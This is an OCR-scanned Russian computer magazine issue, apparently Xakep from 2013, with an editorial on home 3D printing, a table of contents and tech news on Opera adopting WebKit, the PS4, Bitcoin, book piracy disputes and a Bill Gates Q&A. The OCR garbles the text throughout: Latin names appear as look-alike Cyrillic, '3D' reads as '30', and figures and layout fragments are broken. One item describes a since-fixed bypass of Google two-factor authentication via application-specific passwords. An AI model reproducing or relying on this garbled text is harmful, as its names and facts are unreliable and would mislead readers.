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Изобретатель Томас Севери патентует водяной насос, 
в основе которого используется паровой двигатель. Экс- 
перимент оказывается неудачным: устройство не только 
маломощно, но и постоянно взрывается. Однако вскоре по- 
являются сразу несколько удачных паровых машин, которые 
впоследствии навсегда поменяют подход к производству. 
Ручной труд заменяется машинным. Начинается промыш- 
ленная революция. 
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Публикуются первые статьи о технологиях послойного 
создания физического объекта на основе виртуальной 
30-модели. Становится возможным создавать предметы 
не по заранее заготовленной форме, а по чертежу. Это тоже 
маленькая революция, но она по большей части остается 
незаметной. Наверное, потому, что стоимость подобных 
гаджетов начиналась от 10-20 тысяч долларов. 
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XXI век 

Технологии 30-печати развиваются и находят самые 
неожиданные применения: начиная от печати человече- 
ских костей и заканчивая печатью деталей для ракет МАЗА. 
Но главное другое. Одна задругой появляются недо- 
рогие модели 30-принтеров, которые позиционируются 
как домашние. 30-принтер дома! Возможность создавать 
реальные предметы на своем письменном столе! Ломается 
существующий подход к производству. Теперь не нужны 
пресс-формы и дорогущее оборудование, чтобы что-либо 
произвести. Достаточно загрузить его 30-модель и просто 
нажать на кнопку «печать». И вот он, возможно — новый 
іРИопе. Вот, быть может, тысячи и миллионы новых изо- 
бретателей, у которых раньше были связаны руки. Не это ли 
новая революция производства? 



Р. 8. Мир стремительно меняется. И мы меняемся вместе 
с ним. Оцени наш новый дизайн. В нашем СИапдеЕод’е из- 
менения должны были стать небольшим апдейтом, но в ре- 
зультате получился, что называется, мажорный релиз. 
Надеемся, тебе понравится. 
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НОВАЯ 
ЭПОХА ОІУ 

30-Принтеры - тема, которая увлекает 
всех, кто о ней хотя бы раз услышит. 

Но в реальности эти устройства еще 
далеки от мейнстрима. Слишком 
сложны, слишком ненадежны, слишком 
ограничены в возможностях. Но тебя 
ведь это не останавливает, правда? 
Давай посмотрим, что можно сделать 
уже сейчас. 



ПЕРВАЯ 

МОДЕЛЬ 

Для того чтобы прийти в хакспейс 
и начать работать с 30-принтером, 
тебе нужно сделать свою модель. 
Поэтому давай научимся делать это 
и преодолеем единственное препят- 
ствие на твоем пути в мир 30-печати. 
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Интервью с Максимом Мошковым 
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ЫЪ.ги успел набрать 5 гигабайт текстов. После иска 
«КМ онлайн» в 2004 году пополнение остановилось 
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Все новое за последний месяц 
Про бесплатный ѴѴі-Рі 

Запись информации в сервисные разделы НОО 

Почему революция 30-принтеров еще не настала, но уже пора подключаться 
Как мы познакомились с 30-печатью на примере собственного логотипа 
Интервью с Максимом Мошковым 

Как заставить Мак работать за тебя с помощью Аиіотаіог и АррІеЗсгірІ 

Лучшие интернет-браузеры, которыми никто не пользуется 

Зарабатываем деньги на пабликах ВКонтакте 

Выбираем кастомное ядро для своего Апбгоіб-аппарата 

Превращаем планшет в полноценное рабочее место 

Ѵ-ІІ8В - программная реализация 08В для АѴР 

Хакерские секреты простых вещей 

Анализ свеженьких уязвимостей 

Разбираем по косточкам модель безопасности ^іпсіоѵѵз Рііопе 

Как ошибки в админке маршрутизаторов могут выдать полный доступ к роутеру 

Атаки на веб-приложения через Вериезі-иві 

НагРепіпд - путь самурая 

Инструменты для коллективного реверсинга приложений и проведения пентестов 
7 утилит для исследователей безопасности 

Первое тестирование, проведенное при информационной поддержке Капитана Очевидность! 
Дожили! Уже и биографии вирусов публикуют! 

Шестая версия антивирусной линейки от Е8ЕТ 

Подслушиваем, подсматриваем и записываем через Кинект. И это только начало! 
Разбираемся с ргоІоЬиІ 

Подборка интересных заданий, которые дают на собеседованиях 
Обзор ключевых технологий ядра Ыпих 

Создаем отказоустойчивую среду для экспериментов на основе ІІЬипІи 12.10 

Организация безопасного доступа к интернету с помощью ОзегСаІе Ргоху & РігеѵѵаІІ 6.0 

Разворачиваем ѴѴі-Еі Но18ро1 с использованием технологии Сарііѵе Роііаі 

Используем пдіпх для выполнения интересных и нестандартных задач 

ВиІІаІо ипк81а{іоп Міпі 

А8и8ЕееВох РС ЕВ1033 

Вопросы и ответы 

8,5 Гб всякой всячины 

Удобные ѵѵеЬ-сервисы 
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Орега недавно добра- 
лась до отметки в 300 
миллионов пользо- 
вателей, подсчитав 
суммарное количество 
юзеров на ПК и мобиль- 
ных устройствах 



ОРЕРА ПЕРЕХОДИТ 
НАѴѴЕВКІТ 

ѴѴЕВКІТ СТАНОВИТСЯ СТАНДАРТОМ ОЕ РАСТО ДЛЯ МОБИЛЬНЫХ УСТРОЙСТВ 
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Для простых пользователей эти 
перемены вообще должны пройти 
незамеченными, разве что улуч- 
шится совместимость со многими 
сайтами, особенно с мобильны- 
ми. Разработчики тоже пострадать 
не должны — расширения будут 
работать и с новой версией браузе- 
ра; разработан инструмент для кон- 
вертации ОЕХ-расширений в новый 
формат, и подготавливается подроб- 



орвежский браузер Орега существует с 1994 года, 
и за этот долгий срок он сумел заслужить любовь многих 
пользователей (особенно в странах СНГ). Браузер рабо- 
тал надвижке Ргезіо, который некогда создавался, чтобы 
составить конкуренцию Меізсаре и Іпіегпеі Ехріогег. И вот 
недавно компания объявила о том, что новые продукты 
будут использовать движок ѴѴеЬКі^ для рендеринга и Ѵ8 
для обработки ^аѵа8с^ір^ То есть продукты будут основы- 
ваться на опенсорсном браузере СИготіит и его компонентах. 

Получается, что интерфейсная часть браузера будет разра- 
батываться закрыто, а движок — открыто, на основе СПготіит 
и Ѵ8. В общем-то, новость хорошая. Представители Орега по- 
ясняют, что поддержка стандартов у ѴѴеЬКіІ просто великолеп- 
ная, в нем есть все необходимое и в компании не видят смысла 
«изобретать велосипед». Лучше заняться чем-то действительно 
новым и полезным, взяв уже готовый ѴѴеЬКіІ за основу. 



Также штат оперы сократился на ю% — 
из компании ушел ді сотрудник, В основном они 
занимались разработкой Ргезіо и веб-технологий. 
Орега оказала большое влияние на развитие 
НТМІ5 и таких технологий, как ѴѴеЬСЬ 




За все время доля Орега на рынке бра- 
узеров так и не поднялась выше 3% 



ная документация по данным вопросам. Но увы, делать движок Ргезіо опен- 
сорсным в Орега не собираются. Представитель компании прокомментиро- 
вал это так: «Выложить в опенсорс такой продукт, как Ргезіо, — это год работы 
большой команды по подготовке документации и дальнейшей модерации 
процесса развития и разработки. Это слишком затратно, и мы лучше потра- 
тим ресурсы на разработку нового, чем на поддерж- 
ку старого». Выкладывать исходники в сыром виде 
также не планируется. Возможно, проблема в том, 
что код движка лицензирован у других компаний (на- 
пример, у АсІоЬе), но открыто об этом не говорится. 
Первым обновленным продуктом стал мобильный 
браузер для АпРгоісІ, названый Орега (Орега Міпі про- 
должит существование для смартфонов с версией 
Апсігоісі старше, чем 2.3 СіпдегЬгеасІ). Новинку пока- 
зали на МоЬіІе ѴѴогІР Сопдгезз 2013. Версия для дес- 
ктопов появится позже. 
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ПОЧЕМУ 

ТОРМОЗИТ 

СНРОМЕ? 

«САМЫЙ БЫСТРЫЙ БРАУЗЕР», ВОЗМОЖНО, НЕ ТАК УЖ БЫСТР 

Л юбопытная статья появилась в блоге компании 
Арііѵегзе.сот. Некий Алекс Хастингс проанализиро- 
вал, насколько снижается производительность Соодіе 
СИготе спустя несколько недель после его установки. 
Что вдвойне интересно — после попадания на Ребсііі и в СМИ ста- 
тья была удалена с ресурса, а блог закрыт вовсе. 

В статье Хастингс рассказал, что заметил деградацию про- 
изводительности популярного браузера и решил провести опыт. 
Он попросил двадцать добровольцев установить на компьютеры 
Хром и некую программу мониторинга. Как показала практика, 
СИготе работает с кешем и историей посещенных сайтов не так, 
как остальные браузеры. Обычно эти данные хранятся несколько 
недель или месяцев, а после удаляются, по вполне очевидным при- 
чинам. СИготе же хранит данные бессрочно, то есть вечно. 

В итоге временные файлы, кеш и история вместе с индексны- 
ми файлами истории за каждый месяц (плюс дистрибутив каждой 
новой версии браузера) могут занимать несколько гигабайт про- 
странства на жестком диске. Но исследователь отметил, что дело 
не только в разрастании кеша, но и в некорректной реализации 
карты хешей в іпТіпі1е_сасІіе.сс. Задержка навигации составляла 10 
миллисекунд в первый день использования и примерно 90 милли- 
секунд спустя 30 дней. Получается, что чем дольше работает Хром, 
тем медленнее. 




Исследователь поясняет — дело и в особенностях ѴѴеЬКіІ. В среднем 
движок насчитывает 2, 1 выражения С++ на функцию, тогда как у Ріге^ох 
этот показатель равен 6,3. Это приводит к чрезмерному количеству за- 
просов ѵ(аЫе, и страдает производительность. 




ЗАРЯДИСЬ от КОФЕ! 

НЕОБЫЧНАЯ ЗАРЯДКА, ПОСТРОЕННАЯ НАДРЕВНЕМ ПРИНЦИПЕ 

К аждый день на рынок выходят все новые и новые гаджеты, кру- 
че, быстрее и мощнее прошлых поколений, но вот аккумуляторы 
в своем развитии за ними явно не очень поспевают. Чтобы испра- 
вить ситуацию, производители предлагают нам все новые заряд- 
ные устройства — беспроводные, работающие от солнечных батарей, нака- 
пливающие энергию благодаря движениям человека и так далее. Забавный 
проект такого рода появился недавно на Кіскзіаііег. Девайс под названием 
опЕ Риск разрабатывает компания ЕрірЬапу ІаЬз, и нужный для начала произ- 
водства порог в 100 тысяч долларов уже успешно преодолен. 

Идея в основе этого зарядного устройства стара: в основе лежит прин- 
цип двигателя Стирлинга («периодический нагрев и охлаждение рабочего 
тела с извлечением энергии из возникающего при этом изменения объема 
рабочего тела»). Достаточно поставить на поверхность зарядного устройства 
кружку с горячим чаем или кофе (или что-то холодное, только с другой сторо- 
ны), и опЕ Риск начнет генерировать энергию, отдавая ее гаджету. Устройство 
способно заряжать девайсы, ток заряда которых не превышает 1000 мА. По- 
добная штука была бы просто незаменима в дороге. 




Двенадцать уязвимостей 

в ПО приходится на одного пользо- 
вателя, поданным «Лаборатории 
Касперского». Самым дырявым 
ПО признан АРоЬе ЗИоскѵѵаѵе/РІазИ 
РІауег. 




— ^ Хипстеры ликуют: месяч- 
ная аудитория сервиса Іпз^адгат 
наконец превысила отметку 100 
миллионов человек. На достижение 
планки у сервиса ушло два с по- 
ловиной года. 




— > «О^Е^-дисплеи ужасны, на их 
цвета невозможно положить- 
ся», — заявил глава Арріе Тим Кук 
на конференции для инвесторов, 
прошедшей в Сан-Франциско. 




— Еѵегпоіе взломали. Некто 
сумел получить доступ к БД с адре- 
сами е-таіі и парольными хешами 
(с солью) всех юзеров сервиса, 
а это более 50 миллионов человек. 





в МЕОАЫЕУМЗ 







Ѵіѳѵѵвг РН 




ЖИЗНИ 

мы СМОТРИМ НА ЭКРАН 









ПРЕДСТАВЛЕНА 
РЕАУЗТАТІОМ 4 



ПЕРВЫЕ ПОДРОБНОСТИ О НОВОЙ КОНСОЛИ 

С остоялся официальный анонс Зону РІауЗ^аІіоп 4, 
где показали новый контроллер, но не показали 
саму консоль :). Конечно же, стоит начать с железа. 
Зопу рассказали, что базироваться новая пристав- 
ка будет на специальном восьмиядерном процессоре х86-64 
АМО поколения иадиаг, разработанном АМО совместно с Зопу, 
и видеопроцессоре, основанном на АМО Расіеоп ОСМ. Консоль 
получит 8 Гб ОЗУ ОООР5, встроенный жесткий диск (по слухам 
160-500 Гб) и ВО/ОѴО-привод. 

Показанный на презентации контроллер получил название 
ОиаІЗМоск 4. Основным его отличием от предыдущих моделей 
стал тачпад, микрофон и дополнительные кнопки (в том чис- 
ле кнопка «ЗИаге», которая позволяет делиться избранными 
моментами). Также геймпад оснастили сенсором, похожим 
на Моѵе. Представлена и новая 30- камера РІауЗІаІіоп 4 Еуе, 
по функционалу напоминающая Кіпесі. 

Зопу Р34 сможет воспроизводить игры для приставок 
предыдущих поколений, но не будет совместима с дисками 
для них. Чтобы поиграть во что-то старое доброе, придется вос- 
пользоваться облаком. Механизма переноса сейвов при этом 
не предусмотрено. 



Новая консоль должна 
поступить в продажу 
в конце года. Цена 
Р54 пока неизвестна. 
Интересно, как сложат- 
ся отношения новинки 
со 8(еагл Вох, которую 
облака и работа 
без диска не смущают, 
да и с интеграцией с со- 
циальными сервисами 
полный порядок. 



33 $ 

ИЛИ 

22 Е 

СЕГОДНЯ 

СТОИТ 

ОДИН 



— > в конце 2011 
года ВііСоіп 
оценивали 
всего в 2 доллара 
за одну едини- 
цу — мало кто 
верил, что ВіЮоіп 
проживет долго 
и кто-то будет 
воспринимать его 
всерьез. Но все 
вышло иначе. 
Стремительный 
рост последних 
месяцев обу- 
словлен выходом 
крупной биржи 
МТ СОХ, на кото- 



I 0 «ѵ«#. 90 одІе.сот 




Миллиард долларов должна 
заплатить Соодіе, чтобы и далее 
оставаться поиском по умолчанию 
на устройствах Арріе. Ранее этот 
платеж составлял лишь 82 миллио- 
на долларов. 




— О поддержке грядущей 
Рігеіох 08 уже объявили 18 произ- 
водителей оборудования и опера- 
торов связи, включая «Вымпелком», 
«Мегафон», АІсаІеІ, Ниаѵѵеі и ЕС. 




— > В Великобритании в результате ис- 
следования выяснили, что нынешние 
дети проведут почти четверть жизни, гля- 
дя на какие-то экраны — смартфонов, те- 
левизоров, планшетов, мониторов и так 
далее. То же исследование показывает, 
что 22% опрошенных предпочитают об- 
суждать вопросы в Сети, а не встречать- 
ся лично. 
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ОБХОДДВУХФАКТОРНОЙ 
АВТОРИЗАЦИИ ООООВЕ 

ТАК ли БЕЗОПАСНА ДВУХСТУПЕНЧАТАЯ АВТОРИЗАЦИЯ, КАК НАС УВЕРЯЮТ? 

Ч асто на страницах журнала мы приводим слова экспертов, которые рекомен- 
дуют использовать двухфакторную аутентификацию, если это возможно. К со- 
жалению, как выясняется, и двухфакторная авторизация имеет дыры, даже 
если речь идет о Ооодіе. Метод обхода двухфакторной аутентификации Соодіе 
обнаружили ресерчеры из компании Рио Зесигііу ( Ыоо.сіиозесигі^.сот ). Стоит 
сразу сказать, что информацию об уязвимости они опубликовали, лишь дождавшись вы- 
хода официального фикса (хотя ждать пришлось долго — с лета прошлого года). 

Итак, как это работало? Для получения контроля над аккаунтом Соодіе в обход двух- 
факторной авторизации нужно лишь перехва- 
тить/достать пароль приложения (Арріісаііоп 
Зресіііс РаззѵѵогсІ). А8Р генерируются 
для приложений, не поддерживающих двух- 
факторную аутентификацию и не использую- 
щих веб-форму. Для каждого приложения па- 
роль свой. После они хранятся на устройстве 
и используются вместо основного пароля. 

В случае, к примеру, потери смартфо- 
на есть возможность просто сменить А5Р- 
пароли для приложений, не трогая основ- 
ного. Но, как пишут авторы исследования, 
«принято считать, будто А5Р предоставляют 
доступ к конкретному приложению, а не пол- 
номасштабный доступ к аккаунту, и в этой ил- 
люзии кроется большая опасность». 

Так, в последних версиях АпсІгоісІ 
и СЬготе 08 в браузерах Ооодіе заработал 
механизм автологина в Ооодіе-аккаунт. Это 
означает буквально следующее: после того 
как ты в первый раз свяжешь свой смартфон 
(или другое устройство) с аккаунтом Ооодіе, браузер более не станет запрашивать авто- 
ризацию через веб-форму, а будет использовать уже существующую. Беда в том, что это 
правило распространялось и на страницу настроек аккаунта Ооодіе. Ту самую, где находит- 
ся восстановление пароля, добавление и редактирование е-таіі и телефонных номеров, 
на которые будет выслана информация при сбросе пароля. В блоге авторы подробно опи- 
сывают, как сумели эксплуатировать уязвимость, во многом вдохновляясь постами Нико- 
лая Еленкова в блоге АпсІгоісІ Ехріогаііопз ( пеІепкоѵ.ЫоазооІ.ги ). 

Вывод был неутешителен: имея на руках только логин и А8Р-пароль (который можно 
перехватить), достаточно выполнить запрос к апсI^оісI.сIіеп^з.доодIе.сот/аи^^I, и ты залоги- 
нился на страницу настроек аккаунта. Недавнее исправление научило Соодіе определять, 
как именно ты авторизовался — с помощью МегдеЗеззіоп УВЕ или с помощью обычного 
логина и пароля, используя двухфакторную аутентификацию. Страница настроек теперь 
доступна только в последнем случае. 



Слабость А5Р- 
паролей в обман- 
чивом впечат- 
лении, будто они 
предоставляют 
доступ к конкрет- 
ному приложению, 
а не полный до- 
ступ к аккаунту 






г ▼▼іпМ 
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Забавное совпадение, но недавно представители ТѵѵІІІег сообщили о том , что компания тоже ра - 
ботает над внедрением двухфакторной авторизации. На такой шаг компания решилась после того, 
как в феврале в результате хакерской атаки были скомпрометированы 250 миллионов аккаунтов. 




АМА20М ДЕЛАЕТ 
СОБСТВЕННУЮ ВАЛЮТУ 

Виртуальную валюту Соіпз (каждый «койн» равен 
одному центу) будут использовать для оплаты прило- 
жений и другого контента на устройствах компании. 
Разработчики смогут обменять заработанные Соіпз 
на реальные деньги за вычетом 30%, которые Атагоп 
оставляет себе. 




УКРАИНА— ПИРАТСКАЯ 
СТРАНА №1 

Международный альянс интеллектуальной соб- 
ственности (ІІРА) пришел к неожиданному выводу, 
назвав Украину самой пиратской страной (позади 
остались Россия, Индия и Китай), раем для неавтори- 
зованной компьютерной техники и базой для распро- 
странения этого в государства ЕС. 




ХОСТИНГОТПИРАТСКОЙ 

ПАРИИ 



Наша Пиратская партия запустила проект 
рігаІеІіозЕпеТ Хостинг интересен тем, что доступ 
к нему будет ограничен для российских чиновников 
(не все же им ограничивать). «Пираты» пообещали 
внести в собственный черный список известные ІР- 
адреса госорганов и «копирастов». 







в 
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ШАНТАЖ? 
ПОЧЕМУБЫИНЕТ 

ВМЕСТО ПИРАТОВ В РОССИИ БОРЮТСЯ С РАЗРАБОТЧИКАМИ 

Н а Западе проблема книжного пиратства сто- 
ит не так остро, как в наших палестинах, ведь 
там существует удобный Атагоп и множество 
других сервисов, благодаря которым хорошо 
и авторам, и читателям. Куда проще купить электронную 
версию книги, потратив на это пару баксов, нежели убить 
полчаса времени на поиски пиратской копии в торрентах 
или файлообменниках (где можно попросту не обнару- 
жить искомое). Увы, у нас ситуация диаметрально про- 
тивоположная. Наши пиратские библиотеки под завязку 
набиты контентом, их адреса известны всем и каждому, а противопоставить им до сих пор 
почти нечего — легальные ресурсы демонстрируют весьма бедный выбор литературы, 
не отличаются оперативностью и к тому же существуют в каком-то параллельном авторам 
книг измерении (гонорары от продаж электронных версий книг — очень грустная тема). 

Не буду касаться моральной стороны проблемы и углубляться в рассуждения на тему 
«Пиратство — хорошо это или плохо?». Лучше я расскажу тебе невеселую историю о том, 
чем занимаются легальные поставщики книжного контента вместо попыток привлечь поль- 
зователей и бороться с пиратами. Есть такое удобное АпРгоісІ-приложение Мооп+ Реабег — 
популярная читалка (более 5 миллионов установок). Автор отнюдь не злостный пират, 
он даже не знает русского языка и вряд ли знает, что творится на этом рынке в странах СНГ. 
Представь его удивление, когда пришло уведомление о том, что его приложение будет 
удалено из Ооодіе РІау по жалобе «ЛитРес» из-за нарушения ОСМА. Повод был прекрасен: 
приложение содержит ссылки (!) на каталоги интернет-библиотек, которые «ЛитРес» счи- 
тает пиратскими. Приложение действительно удалили. А потом благодаря постам шоки- 
рованного разработчика в Сети поднялось возмущение, и стали выясняться подробности. 

Оказалось, что «ЛитРес» предлагал отозвать жалобу, если разработчик согласится по- 
лучить и использовать черный список сайтов, которые нельзя будет добавить в программу 
даже вручную. За это щедрый и добрый «ЛитРес» даже предлагал поделиться с автором 
процентом с продажи своих книг через программу. Более того, письмо с похожими угро- 
зами и требованием встроить в программу черный список поступило и автору другой по- 
пулярной читалки — СооІ Реабег (тоже несколько миллионов установок). Получается, 
что вместо того, чтобы бороться с пиратами, «ЛитРес» решил бороться с авторами при- 
ложений-читалок (их так легко «прижать» с помощью ОСМА), которые к книгам, пиратам 
и прочему не имеют ни малейшего отношения. Рассуждая здраво, с тем же успехом можно 
«жаловаться» на браузеры — в них тоже много нехороших ссылок открыть можно. Но кого 
волнует какой-то здравый смысл? 

История с Мооп+ Веабег, на удивление, закончилась хорошо. На Хабре и 4РОА обсуж- 
дение этого произвола набрало огромное количество комментариев, волну подхватили 
известные блогеры и СМИ. Видимо, благодаря этому справедливость и восторжествова- 
ла: разработчик удалил большинство ссылок на русские каталоги (не встраивая никакого 
черного списка, конечно же), и Мооп+ Веабег вернулся в строй. А «ЛитРесу» слили рейтинг 
почти под единицу. 




^ Сюск^іеріау 






•Іооп-*- Яеаёег Рго 

т-шт 


ЙЙІ ' 

Мооп+ Наа^ег Рю 


. 


ВПЖ 



и 






к сожалению, эта си- 
туация ненова. ИзАрр 
81 оге таким образом 
уже «выжили» при- 
ложение «Читатель», 
заблокировав его 
по жалобе компании 
«ЛитРес», представ- 
лявшей интересы из- 
дательства «Эксмо». 



и 










СПАСИБО, ЧТО КАЧАЛИ! 

Режиссер популярнейшего сериала Оате о^ 
ТИгопез Дэвид Петрарка поблагодарил всех, кто 
качает сериал из торрентов. Пиратство, по мнению 
Дэвида, лишь увеличивает популярность шоу (и ори- 
гинальной книжной саги), а также прибавляет платных 
подписчиков телеканалу НВО. 




исходники РНОТОЗНОР 
1.0 ОПУБЛИКОВАНЫ 

Исходный код РИо^озМор 1.0.1, написанный Тома- 
сом Кнолом в 1990 году, стал музейным экспонатом. 
Его опубликовал музей компьютерной истории, рас- 
положенный в городе Маунтин-Вью, в Калифорнии. 
Большая часть кода (83%) написана на языке РазсаІ, 
а 17%— на ассемблере процессора Моіогоіа 68000. 




ЖИЗНЬ ПОСЛЕ 
ТНЕРІ ПАТЕ ВАУ 



Вышла документальная лента «ТРВ АРК: ТЬе 
Рігаіе Вау Аѵѵау Ргот КеуЬоагб», посвященная судьбе 
основателей «Пиратской бухты» после знаменитого 
судебного процесса. Фильм выпущен под лицензией 
Сгеаііѵе Соттопз, так что его можно бесплатно ска- 
чать с торрентов или посмотреть наУоиТиЬе. 
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БИЛЛ ГЕЙТС 
ПООБЩАЛСЯ 
С НАРОДОМ 

ЭКС-ГЛАВА МІСП080ГТ ОТВЕТИЛ НА ВОПРОСЫ 
ПОСЕТИТЕЛЕЙ ЯЕООІТ 

Н а Ресісііі регулярно проводят своеобразные интервью 
с известными личностями, так называемые сессии во- 
просов-ответов «Азк Ме АпуІІііпд» (спросите меня о чем 
угодно). Интервьюерами выступают сами пользователи 
(в комментах), которым гости отвечают в режиме более или менее 
реального времени. На этот раз пообщаться с публикой решил Билл 
Гейтс, к которому можно относиться по-разному, но недооценивать 
его вклад в наше с тобой сегодня трудно. Вот некоторые интересные 
моменты разговора: 

В: Вы все еще программируете, если да, то на каком языке? 

О: Не так много, как хотелось бы. Я пищу на С, С# и немного на Вазіс. 
Удивительно, но новые языки так и не привели к упрощению про- 
граммирования. Было бы здорово, если бы школьники знакоми- 
лись с программированием. 

В: Насколько правдоподобен фильм «Пираты Кремниевой долины» 
(известный фильм о становлении компании Арріе и МісгозоЙ) 
и то, как там изобразили вас? 

О: Меня там показали довольно точно (в фильме, естественно, по- 
казан харизматичный. — Прим. ред.). 

В: Назовите самую дешевую вещь, которая может вас порадовать. 
О: Дети. Чизбургеры. Онлайн-курсы МІТ. 

В: А где вы находите дешевых детей? 

О: Их приносит аист. 

В: Осталось ли еще хоть что-то, что бы вы хотели сделать в этой 
жизни? 

О: Сделать так, чтобы она не заканчивалась. 




Билл Гейтс много расска- 
зывал о деятельности их 
совместного с женой бла- 
готворительного фонда 
«Фонд Билла и Мелинды 
Гейтс», а также сказал, 
что, если бы не появились 
микропроцессоры, он, 
возможно, занялся бы 
медициной или теорети- 
ческой математикой. 




іі ЗОМБИ-АПОКАЛИПСИС 
:: отхАКЕРОВ 

II УДАЧНЫЙ ПРАНК НЕ НА ШУТКУ НАПУГАЛ ОБЫВАТЕЛЕЙ 



Н еизвестные взломали американскую телестанцию КПТѴ (систему 
экстренного оповещения) и объявили на несколько районов Мон- 
таны о начале зомби-апокалипсиса. В эфире появилась бегущая 
строка, а голос за кадром сообщил: «Тела мертвых встают из мо- 
гил и атакуют живых людей». Как сообщается в местной газете, минимум че- 
тыре жителя города Грейт-Фоллс обратились за разъяснениями в полицию. 

В 1938 году более изощренным образом провернул аналогичный трюк 
знаменитый режиссер Орсон Уэллс («Гражданин Кейн»). Накануне Хэллоуи- 
на на радио была запущена целая передача в новостном жанре, основанная 
на книге «Война миров» Герберта Уэллса. Часовой новостной сюжет пода- 
вался эпизодами, прерывая другие программы на радиостанции (как и по- 
лагается срочной новостной сводке), в которых сообщалось, что марсиане 
начали высаживаться в пригородах Нью-Джерси. В программу приглащались 
вымышленные эксперты и репортеры, вещавшие непосредственно с места 
событий. Естественно, многие купились на изощренную «утку». 

Впрочем, размеры всеобщей паники могли быть преувеличены газетчика- 
ми. желавшими показать, что, хотя радио (относительно новый для того вре- 
мени канал информации) и способно оповещать оперативнее печатных СМИ, 
обеспечить такую же достоверность оно не в силах. Ничего не напоминает? 




Публика принимает ѴУІПСІОѴѴ8 
8 даже хуже, чем Ѵівіа. Спустя 
три месяца после релиза «восьмер- 
ку» нашли лишь на 2,26% ПК (по 
данным МеІАррІісаІіопз). 



Медаль для бойцов кибер- 
фронта учредило Минобороны 
США. Знак отличия получил на- 
звание ОізІіпдиізИеб ѴѴаНаге МесІаІ 
(медаль за выдающееся ведение 
войны). 



— > Похоже, іСІоиб фильтрует 
контент по ключевым словам. 

Так, обнаружилось, что файл 
со словами «Ьагеіу ІедаІ Іеепз» 
(«подростки слегка за 18») не жела- 
ет отправляться с іСІоиб на почту. 



— > Создатель Міпесга^І Маркус 
Персон уже заработал более 100 
миллионов долларов, но не знает, 
что с этим делать. На Ресісііі он при- 
знался, что все это «ѵѵеігсі аз ^иск» :). 
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МЕСАЫЕѴ/3 



V, 



АВТОМАТ ПО 
ПРОДАЖЕ ВІТСОІМ 

ПОКУПАТЬ КРИПТОВАЛЮТУ СКОРО БУДЕТ возможно ГДЕ УГОДНО 





Создатели автомата 
надеются, что скоро та- 
кие «банкоматы» будут 
размещаться в отелях, 
барах, на остановках 
транспорта и во- 
обще — всюду. Ведь 
криптовалюта до- 
рожает, завоевывает 
все больше доверия . 
Например, часть со- 
трудников АгсЫѵе.огд 
согласились получать 
зарплату в ВС. 



Н есмотря на прогнозы злопыхателей, виртуальная валюта ВіЮоіп живее всех 
живых и стремительно развивается. В свете последних успехов криптоденег, 
не так уж удивительно появление автомата, принимающего деньги бумажные 
и меняющего их на ВііСоіп. Такой девайс создали американцы Зак Харви и Мэтт 
Уитлок, дав ему незамысловатое название ТИе ВіІсоіп МасИіпе. Принцип работы 
«биткоиномата» таков; понадобится установить биткоин- клиент для АпсІгоісІ на смартфон 
или планшет, сгенерировать ОР-код кошелька и поднести экран устройства к камере ТИе 
ВІІСОІП МасИіпе. Ну и, конечно, понадобятся обычные бумажные деньги. Необычный «бан- 
комат» работает на базе компьютера РазрЬеггу Рі и от любой беспроводной сети. Он рас- 
познает ОР-код и перечислит нужное количество биткоинов на соответствующий кошелек. 
Зачисление денег происходит немедленно после того, как в приемник банкомата посту- 
пили бумажные долларовые купюры, по текущему курсу ВТС/1150. После этого банкомат 
показывает ОР-код со ссылкой для проверки транзакции. 




— Оказалось, что Місгозо^І 
О^Іісе 2013 нельзя перенести 
на другой комп. Даже в случае 
поломки или модификации. Ли- 
цензия этого не предусматривает. 
Совсем. 



— Магазин Апсігоісі-приложений 
УапсІех.ЗІоге запустила компания 
«Яндекс». Площадка содержит 
более 50 тысяч приложений, все 
проверены «Антивирусом Каспер- 
ского». 







НОВЫЙ ШТРАФ 
МІСРОЗОРТ 






> Власти Евросоюза оштрафовали 
МісгозоЛ за то, что вѴѴіпбоѵѵз 7 5Р1 
отсутствует экран выбора браузера 
Напомним, что по решению от 2009 
года компания обязана давать 
европейцам такую возможность 
во всех версиях ѴѴіпсІоѵѵз. МісгозоЛ 
объяснила происшествие ошибкой 
при подготовке сервис-пака. Кста- 
ти, говорят, что факап мелкомягких 
вскрылся по наводке Соодіе. 



500 

МИЛЛИОНОВ 

ДОЛЛАРОВ 

НАДИАЛАПЕ 




Парадоксально, но факт — 
на диалапе до сих пор можно за- 
рабатывать деньги. Этим успешно 
занимается компания АОЕ, некогда 
один из крупнейших провайдеров 
США. Согласно квартальному от- 
чету, диалап приносит компании 
примерно полмиллиарда долларов 
за полугодие! Больше, чем осталь- 
ные сервисы, вместе взятые. 



пгоо 
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КАК МОЖНО 
ПОДКЛЮЧИТЬСЯ 
к ГИГАБИТНОМУ ѴѴІ 
УЖЕ СЕЙЧАС? 



АДАПТЕРЫ ДЛЯ 
ПОДКЛЮЧЕНИЯ 
К802.11АСОТАЗиЗ 



-Рі 




Чуть больше года прошло между 
первой демонстрацией домашних 
устройств, поддерживающих стандарт 
802. Нас, и уже в февральском номере 
мы рассказывали тебе о роутере А51І5 
РТ-АС661І. Мощнейшая железка, по- 
зволяющая тебе организовать дома 
гигабитный ѴѴІ-РІ. Роутер построен 
на базе РТ-МббУ, одного из лучших 
устройств на рынке, поэтому ожидае- 
мо, что он стал только круче. Остает- 
ся только одно «но»: а что по новому 
стандарту уже можно подключить 
к АС661І? Ну, кроме другого АС661І. 
Оказывается, почти все — нужно 
только иметь правильный «ключик». 
Точнее, один из двух ключиков. 



О 



Александр Расмус 

газти5@геа1.хакео.ги 



ДЛЯ ДЕСКТОПОВ: 
А$и8РСЕ-АС66 

Внешняя двухдиапазонная антен- 
на подключается через адаптер 
к разъему РСІ Ехргезз. Внушитель- 
ная конструкция обеспечивает 
подключение на скорости до 1,3 
гигабит в секунду. Антенна при этом 
крепится прямо к корпусу компью- 
тера. В целом — хорошее решение 
для НТРС и файловых серверов, 
до которых по какой-то причине 
нельзя дотянуться проводом. 





ДЛЯ НОУТБУКОВ: А$и8 У8В-АС53 

Адаптер в виде 118В-адаптера, обеспе- 
чивающий подключение на скорости 867 
мегабит в секунду. Адаптер может стоять 
в подставке или крепиться к крышке ноут- 
бука с помощью специальной прищепки. 
Также в комплекте — УЗВ-удлинитель. 



На правах рекламы 



МЕОАЫЕѴѴЗ 
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«ЖЕЛЕЗНЫЕ» ВЕСТИ 
ИЗ СТАНА СОООЕЕ 

ОЧКИ СООСІЕ СІА88 И «ХРОМБУК» ПРЕМИУМ-КЛАССА 

В стане «корпорации добра» все время что-то происходит, но последний ме- 
сяц был особенно богат на заметные события. И главным из них стал ноутбук 
СПготеЬоок РіхеІ. Новинка поразительна тем, что это ноутбук стоимостью 
